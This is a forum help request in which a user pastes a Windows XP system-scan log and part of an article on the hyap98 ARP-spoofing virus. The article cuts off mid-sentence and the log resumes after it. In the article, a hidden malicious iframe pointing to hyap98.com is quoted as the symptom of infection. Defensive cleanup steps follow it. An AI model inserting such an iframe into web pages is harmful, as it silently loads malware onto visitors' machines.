最近一段时间一上网NOD32就提示有木马，现在把相关蛛丝马迹贴了，高手看看。
System Repair Engineer 2.4.12.806
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能

以下内容被选中：
    所有的启动项目（包括注册表、启动文件夹、服务等）
    浏览器加载项
    正在运行的进程（包括进程模块信息）
    文件关联
    Winsock 提供者
    Autorun.inf
    HOSTS 文件


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Publisher]
    <PSwitch><C:\Documents and Settings\********.********-C05015\My Documents\bbbb\代理搜索、测试和管理 Proxy Switcher Pro 3.5.3537绿色版\Proxy Switcher Standard\ProxySwitcher.exe>  [N/A]
    <MSMSGS><; "C:\Program Files\Messenger\msmsgs.exe" /background>  [Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <IMJPMIG8.1><"C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32>  [(Verified)Microsoft Windows Publisher]
    <PHIME2002ASync><C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC>  [(Verified)Microsoft Windows Publisher]
    <PHIME2002A><C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName>  [(Verified)Microsoft Windows Publisher]
    <High Definition Audio Property Page Shortcut><HDAShCut.exe>  [(Verified)Microsoft Windows XP Publisher]
    <SKYNET Personal FireWall><C:\Program Files\SkyNet\FireWall\pfw.exe>  [广州众达天网技术有限公司]
    <Antiy Auto Update><C:\Program Files\Antiy Labs\Alive\AliveCenter.exe>  [安天信息技术有限公司]
    <AGB5Monitor><C:\Program Files\Antiy Labs\AGuard\AGuard.exe /AutoRun>  [安天信息技术有限公司]
    <IMSCMig><C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload>  [(Verified)Microsoft Corporation]
    <nod32kui><"C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE>  [Eset ]
    <IMEKRMIG6.1><C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE>  [(Verified)Microsoft Windows Publisher]
    <MSPY2002><C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC>  [(Verified)Microsoft Windows Publisher]
    <igfxtray><C:\WINDOWS\system32\igfxtray.exe>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <igfxhkcmd><C:\WINDOWS\system32\hkcmd.exe>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <igfxpers><C:\WINDOWS\system32\igfxpers.exe>  [(Verified)Microsoft Windows Publisher]
    <RTHDCPL><RTHDCPL.EXE>  [(Verified)Microsoft Windows Publisher]
    <StormCodec_Helper><"E:\anzhuang\baofengyingyin\Storm Codec\StormSet.exe" /S /opti>  []
    <AntiArpSniffer><; C:\Program Files\Anti ARP Sniffer\AntiArpSniffer.exe>  []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Windows Publisher]
    <Userinit><C:\WINDOWS\system32\UserInit.exe,>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{57B86673-276A-48B2-BAE7-C6DBB3020EB8}><C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll>  [Anti-Malware Development a.s.]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
    <WinlogonNotify: igfxcui><igfxdev.dll>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]

==================================
启动文件夹
[快捷方式 到 Notshare]
  <C:\Documents and Settings\********.********-C05015\「开始」菜单\程序\启动\快捷方式 到 Notshare.lnk --> D:\基础知识\Notshare.bat [N/A]><N>

==================================
服务
[ASP.NET State Service / aspnet_state][Stopped/Manual Start]
  <C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe><N/A>
[AVG Anti-Spyware Guard / AVG Anti-Spyware Guard][Running/Auto Start]
  <C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe><Anti-Malware Development a.s.>
[Human Interface Device Access / HidServ][Stopped/Disabled]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[NOD32 Kernel Service / NOD32krn][Running/Auto Start]
  <"C:\Program Files\Eset\nod32krn.exe"><Eset>
[Spyware Terminator Clam Service / sp_clamsrv][Stopped/Auto Start]
  <C:\Program Files\WinClamAVShield\sp_clamsrv.exe><N/A>

==================================
驱动程序
[AMON / AMON][Running/Auto Start]
  <\??\C:\WINDOWS\system32\drivers\amon.sys><Eset>
[AntiyFirewall / AntiyFirewall][Running/Manual Start]
  <\??\C:\WINDOWS\system32\drivers\AntiyFW.sys><N/A>
[AVG Anti-Spyware Driver / AVG Anti-Spyware Driver][Running/System Start]
  <\??\C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys><N/A>
[AVG Anti-Spyware Clean Driver / AvgAsCln][Running/System Start]
  <System32\DRIVERS\AvgAsCln.sys><GRISOFT, s.r.o.>
[Broadcom NetXtreme Gigabit Ethernet / b57w2k][Running/Manual Start]
  <system32\DRIVERS\b57xp32.sys><Broadcom Corporation>
[Microsoft UAA Function Driver for High Definition Audio Service / HdAudAddService][Stopped/Manual Start]
  <system32\drivers\HdAudio.sys><Windows (R) Server 2003 DDK provider>
[Microsoft UAA Bus Driver for High Definition Audio / HDAudBus][Running/Manual Start]
  <system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[ialm / ialm][Running/Manual Start]
  <system32\DRIVERS\ialmnt5.sys><Intel Corporation>
[imagedrv / imagedrv][Running/Boot Start]
  <\SystemRoot\System32\Drivers\imagedrv.sys><Ahead Software AG>
[imagesrv / imagesrv][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\imagesrv.sys><Ahead Software AG>
[Service for Realtek HD Audio (WDM) / IntcAzAudAddService][Running/Manual Start]
  <system32\drivers\RtkHDAud.sys><Realtek Semiconductor Corp.>
[NetrobocopLowLevelService / NPF][Stopped/Manual Start]
  <\??\C:\DOCUME~1\ANDYLA~1.SHA\LOCALS~1\Temp\nsb\npf.sys><N/A>
[npkcrypt / npkcrypt][Running/Auto Start]
  <\??\C:\Program Files\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[RsAntiSpyware / RsAntiSpyware][Running/Boot Start]
  <\SystemRoot\system32\drivers\RsBoot.sys><Beijing Rising>
[Secdrv / Secdrv][Running/Auto Start]
  <system32\DRIVERS\secdrv.sys><Macrovision Europe Ltd>
[USB Filter Driver / ser2pl][Stopped/Manual Start]
  <system32\DRIVERS\ser2pl.sys><Prolific Technology Inc.>
[StarForce Protection Environment Driver (version 1.x.a) / sfdrv01a][Running/Boot Start]
  <\SystemRoot\System32\drivers\sfdrv01a.sys><Protection Technology (StarForce)>
[StarForce Protection Helper Driver (version 2.x) / sfhlp02][Running/Boot Start]
  <\SystemRoot\System32\drivers\sfhlp02.sys><Protection Technology (StarForce)>
[StarForce Protection Synchronization Driver (version 4.x) / sfsync04][Running/Boot Start]
  <\SystemRoot\System32\drivers\sfsync04.sys><Protection Technology (StarForce)>
[SKNFW / SKNFW][Running/System Start]
  <\??\C:\WINDOWS\system32\Drivers\SKNFW.sys><N/A>
[SkyProcs / SkyProcs][Running/Manual Start]
  <\??\C:\Program Files\SkyNet\FireWall\SkyProcs.sys><N/A>
[Sony USB Filter Driver (SONYPVU1) / SONYPVU1][Stopped/Manual Start]
  <system32\DRIVERS\SONYPVU1.SYS><Sony Corporation>
[XScanPF / XScanPF][Stopped/Manual Start]
  <\??\C:\Documents and Settings\********.********-C05015\桌面\X-Scan-v3.3-cn\X-Scan-v3.3\dat\xpf.sys><N/A>

详情请参考：
http://www.data10000.com/Article/systemsafety/virus/200706/29834.html



对付hyap98病毒的最有效方法 （hyap98.com、zpx520.com等ani病毒处理方法）
请情请参考：
http://www.data10000.com/Article/systemsafety/virus/200706/29834.html




症状：
上网网页无法正常显示，打开IE->查看->源程序，发现里面有这样一行（或类似）代码
<iframe src='http://www.hyap98.com/123/ad.htm' height='0'></iframe>


看来机子中毒了，于是用最新的杀毒软件（还有木马专杀工具）把整个硬盘杀了个底朝天，真的杀了不少病毒，这下该正常了吧。上

网试试看，问题又重复出现，再杀，这次什么也没查到。怎么回事呢？

原因：
其实你使用的电脑上，已经没有病毒了，有毒的是你所在局域网中的另一台电脑，它中了ARP病毒（欺骗）。那台中毒的电脑不断地

将病毒送往你的电脑上。

处理步骤：
第一步、下载Anti arp sniffer（网址http://www.data10000.com/Soft/200706/4.html）和nbtscan（网址

http://www.data10000.com/Soft/200706/5.html）两个软件吧。这两个工具能帮助你轻而易举地找到毒源。

第二步、找出中毒的那一台电脑。


运行Anti arp sniffer，可能里面有些并不清楚，这就要借助nbtscan了。
点出开始->运行，填写command后确定，出现dos窗口，在dos提示符下输入：d:\nbtscan\nbtscan -r 192.168.1.1/24。
（现在假设你运行的这台电脑的IP地址是192.168.1.18,网关192.168.1.1,局域网内的所有IP在192.168.1.1~254内，nbtscan文件所

存目录在d盘nbtscan目录下。）





第三步、找到相应的数据填入Anti arp sniffer内，点击获取网关MAC地址->自动防护->防护地址冲突，不一会Anti arp sniffer小

窗口就出现“攻击者MAC地址：00-e0-a0-0b-87-ca",右下解也出现arp欺骗提示，在DOS窗口内找到对应的IP地址是192.168.1.134名

称叫“MING”的计算机，（未出现以上提示时，试一下用IE上网，包即时出现）这时有问题的电脑就找到了。

用最新杀毒软件和反木马流氓软件（如360安全卫士http://www.360safe.com）,清除问题电脑上的病毒、木马、流氓软件（顺便说一

下，杀毒最好在安全模式（开机时按F8键）下进行，正

浏览器加载项
[Adobe PDF Reader Link Helper]
  {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Yahoo! IE Services Button]
  {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} <C:\Program Files\Yahoo!\Common\yiesrvc.dll, Yahoo! Inc.>
[BLin IeDoor Class]
  {A7934164-66CE-4B01-AD28-A42F734E448D} <C:\Documents and Settings\********.********-C05015\blin\blinplug.dll, BLin Inc.>
[浩方对战平台]
  {0A155D3C-68E2-4215-A47A-E800A446447A} <E:\anzhuang\HAOFANG\浩方对战平台\GameClient.exe, 上海浩方在线信息技术有限公司>
[Yahoo! IE Services Button]
  {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} <C:\Program Files\Yahoo!\Common\yiesrvc.dll, Yahoo! Inc.>
[信息检索(&R)]
  {92780B25-18CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL, Microsoft Corporation>
[Messenger]
  {FB5F1910-F110-11d2-BB9E-00C04F795683} <C:\Program Files\Messenger\msmsgs.exe, Microsoft Corporation>
[访问瑞星网站]
  {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} <http://www.rising.com.cn/?u=RSTB, N/A>
[访问卡卡社区]
  {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} <http://www.ikaka.com/?u=RSTB, N/A>
[BitComet工具栏]
  {3F1ABCDB-A875-46c1-8345-B72A4567E486} <C:\Program Files\BitComet\BitCometBar\BitCometBar0.6.dll, >
[卡卡上网安全助手]
  {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[YInstStarter Class]
  {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} <C:\Program Files\Yahoo!\Common\yinsthelper.dll, Yahoo! Inc.>
[WUWebControl Class]
  {6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, Microsoft Corporation>
[Filetran Control]
  {88734439-46D0-42C0-A13F-7E881EE550CF} <C:\WINDOWS\DOWNLO~1\filetran.ocx, Bluesky Studio(http://www.bluesky.cn)>
[Netease Chat Control]
  {C37FBD87-3AA7-4640-9A8D-19AFC10B15B2} <C:\WINDOWS\DOWNLO~1\chat.ocx, Netease>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[Yahoo! Toolbar Helper]
  {02478D38-C3F9-4EFB-9B51-7695ECA05670} <, N/A>
[Adobe PDF Reader Link Helper]
  {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[PeerDraw Class]
  {10072CEC-8CC1-11D1-986E-00A0C955B42E} <C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll, Microsoft Corporation>
[Windows Media Player]
  {22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[HTML Document]
  {25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, N/A>
[DHTML Edit Control Safe for Scripting for IE5]
  {2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, Microsoft Corporation>
[HtmlDlgSafeHelper Class]
  {3050F819-98B5-11CF-BB82-00AA00BDCE0B} <C:\WINDOWS\system32\mshtmled.dll, Microsoft Corporation>
[IETag Factory]
  {38481807-CA0E-42D2-BF39-B33AF135CC4D} <C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\IETAG.DLL, Microsoft Corporation>
[BitComet工具栏]
  {3F1ABCDB-A875-46C1-8345-B72A4567E486} <C:\Program Files\BitComet\BitCometBar\BitCometBar0.6.dll, >
[HHCtrl Object]
  {52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, Microsoft Corporation>
[Shell Name Space]
  {55136805-B2DE-11D1-B9F2-00A0C98BC547} <%SystemRoot%\system32\shdocvw.dll, N/A>
[Yahoo! IE Services Button]
  {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} <C:\Program Files\Yahoo!\Common\yiesrvc.dll, Yahoo! Inc.>
[WUWebControl Class]
  {6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, Microsoft Corporation>
[Windows Media Player]
  {6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[Microsoft Web 浏览器]
  {8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, Microsoft Corporation>
[Filetran Control]
  {88734439-46D0-42C0-A13F-7E881EE550CF} <C:\WINDOWS\DOWNLO~1\filetran.ocx, Bluesky Studio(http://www.bluesky.cn)>
[BLin IeDoor Class]
  {A7934164-66CE-4B01-AD28-A42F734E448D} <C:\Documents and Settings\********.********-C05015\blin\blinplug.dll, BLin Inc.>
[RMGetLicense Class]
  {A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, Microsoft Corporation>
[Qzone Media Tools]
  {AC3A36A8-9BFF-410A-A33D-2279FFEB69D2} <E:\anzhuang\qq\VQQPLA~1.OCX, Tencent Technology (Shenzhen) Company Limited>
[Microsoft Scriptlet Component]
  {AE24FDAE-03C6-11D1-8B76-0080C744F389} <C:\WINDOWS\system32\mshtml.dll, Microsoft Corporation>
[SearchAssistantOC]
  {B45FF030-4447-11D2-85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, N/A>
[RDS.DataSpace]
  {BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, Microsoft Corporation>
[Netease Chat Control]
  {C37FBD87-3AA7-4640-9A8D-19AFC10B15B2} <C:\WINDOWS\DOWNLO~1\chat.ocx, Netease>
[AUDIO__MP3 Moniker Class]
  {CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
  {CD3AFA84-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_WMV Moniker Class]
  {CD3AFA94-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[RealPlayer G2 Control]
  {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA} <C:\WINDOWS\system32\rmoc3260.dll, RealNetworks, Inc.>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[GetInfo Class]
  {D5184A39-CBDF-4A4F-AC1A-7A45A852C883} <C:\PROGRA~1\Yahoo!\Common\yverinfo.dll, Yahoo! Inc.>
[卡卡上网安全助手]
  {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[Yahoo! Toolbar]
  {EF99BD32-C1FB-11D2-892F-0090271D4F88} <, N/A>
[&使用比邻下载(&B)]
  <C:\Documents and Settings\********.********-C05015\blin\ctxmenu.htm, N/A>
[&使用迅雷下载]
  <C:\anzhuang\xunlei\Program\geturl.htm, N/A>
[&使用迅雷下载全部链接]
  <C:\anzhuang\xunlei\Program\getallurl.htm, N/A>
[Yahoo! &Dictionary]
  <file:///C:\Program Files\Yahoo!\Common/ycdict.htm, N/A>
[Yahoo! &Maps]
  <file:///C:\Program Files\Yahoo!\Common/ycmap.htm, N/A>
[Yahoo! &SMS]
  <file:///C:\Program Files\Yahoo!\Common/ycsms.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
  <res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ表情]
  <E:\anzhuang\qq\AddEmotion.htm, N/A>
[火狐Flash保存]
  <E:\anzhuang\flash\FoxFlashplayer\PlugIns\GetFlash.htm, N/A>

正在运行的进程
[PID: 664][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 728][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 752][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\igfxdev.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 796][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 808][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 964][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1040][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 1132][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 3908][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll]  [Adobe Systems, Inc., 7.0.0.0]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxpph.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxress.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll]  [Anti-Malware Development a.s., 7, 5, 0, 47]
    [C:\Program Files\Antiy Labs\AGB5Cn\AGBCM.dll]  [Antiy Labs, 3, 0, 0, 0]
    [C:\PROGRA~1\Yahoo!\Common\ymmapi.dll]  [Yahoo! Inc., 2005, 1, 1, 4]
    [C:\Program Files\WinRAR\rarext.dll]  [N/A, ]
    [C:\Program Files\Eset\nodshex.dll]  [N/A, ]
    [C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\context.dll]  [Anti-Malware Development a.s., 7, 5, 0, 49]
    [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll]  [Adobe Systems Incorporated, 7.0.9.2006121800]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
[PID: 704][C:\Program Files\Eset\nod32kui.exe]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\nod32rui.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_amon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_amon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pu_dmon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_dmon.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_emon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_emon.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_nod32.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_nod32.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pu_upd.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_upd.dll]  [N/A, ]
[PID: 2096][C:\WINDOWS\system32\igfxtray.exe]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxress.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 2236][C:\WINDOWS\system32\hkcmd.exe]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 2092][C:\WINDOWS\system32\igfxpers.exe]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 2632][C:\Program Files\Antiy Labs\Alive\AliveCenter_.exe]  [安天信息技术有限公司, 2, 1, 4, 0]
[PID: 2660][C:\Program Files\Antiy Labs\AGuard\AGuard_.exe]  [安天信息技术有限公司, 2, 4, 6, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\AVLeachSDK.dll]  [Antiy Labs, 2, 0, 3, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\AExploit.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\APack.dll]  [Antiy Labs, 1, 0, 1, 1]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\APk.dll]  [Antiy Labs, 1, 0, 2, 3]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\ARealPop.dll]  [N/A, ]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\ATrojan.dll]  [Antiy Labs, 1, 0, 14, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\KillTrojan.dll]  [Antiy Labs, 1, 0, 0, 3]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\MiscFix.dll]  [Antiy Labs, 1, 0, 1, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\ScanReg.dll]  [, 1, 0, 0, 4]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 2768][C:\WINDOWS\RTHDCPL.EXE]  [Realtek Semiconductor Corp., 2.0.6.4]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 2808][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2816][C:\WINDOWS\system32\conime.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 3520][C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe]  [Anti-Malware Development a.s., 7, 5, 0, 50]
    [C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\engine.dll]  [Anti-Malware Development a.s., 4, 2, 0, 15]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 476][C:\Program Files\Internet Explorer\IEXPLORE.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll]  [Adobe Systems Incorporated, 7.0.9.2006121800]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\Program Files\Yahoo!\Common\yiesrvc.dll]  [Yahoo! Inc., 2006, 10, 31, 3]
    [C:\Program Files\Yahoo!\Common\YIeTagBm.dll]  [Yahoo! Inc., 2006, 7, 28, 1]
    [C:\Documents and Settings\********.********-C05015\blin\blinplug.dll]  [BLin Inc., 0, 7, 3, 18]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx]  [Adobe Systems, Inc., 9,0,28,0]
    [C:\Program Files\Yahoo!\Common\yloginids.dll]  [Yahoo!, 2005, 8, 17, 1]
    [C:\WINDOWS\system32\xpsp3res.dll]  [Microsoft Corporation, 5.1.2600.3121 (xpsp_sp2_gdr.070418-0032)]
[PID: 3052][C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE]  [Microsoft Corporation, 11.0.5604]
    [C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll]  [Microsoft Corporation, 11.0.6360]
    [C:\Program Files\Common Files\Microsoft Shared\office11\riched20.dll]  [Microsoft Corporation, 5.50.99.2009]
    [C:\Program Files\Eset\Dmon.dll]  [Eset , 2, 51, 26 ]
    [C:\PROGRA~1\MICROS~2\OFFICE11\ADDINS\SYMINPUT.DLL]  [Microsoft Corporation, 1.02]
    [C:\WINDOWS\system32\MSVBVM60.DLL]  [Microsoft Corporation, 6.00.9690]
    [C:\WINDOWS\system32\VB6CHS.DLL]  [Microsoft Corporation, 6.00.8988]
    [C:\Program Files\Common Files\Kingsoft\Extract\PWOffice2.dll]  [Kingsoft Co, Ltd., 8, 5, 1, 0]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL]  [Microsoft Corporation, 1.1.6215]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\mslid.dll]  [Microsoft Corporation, 1.0.2305]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\2052\MSGR3EN.DLL]  [Microsoft Corporation, 3.1.2303]
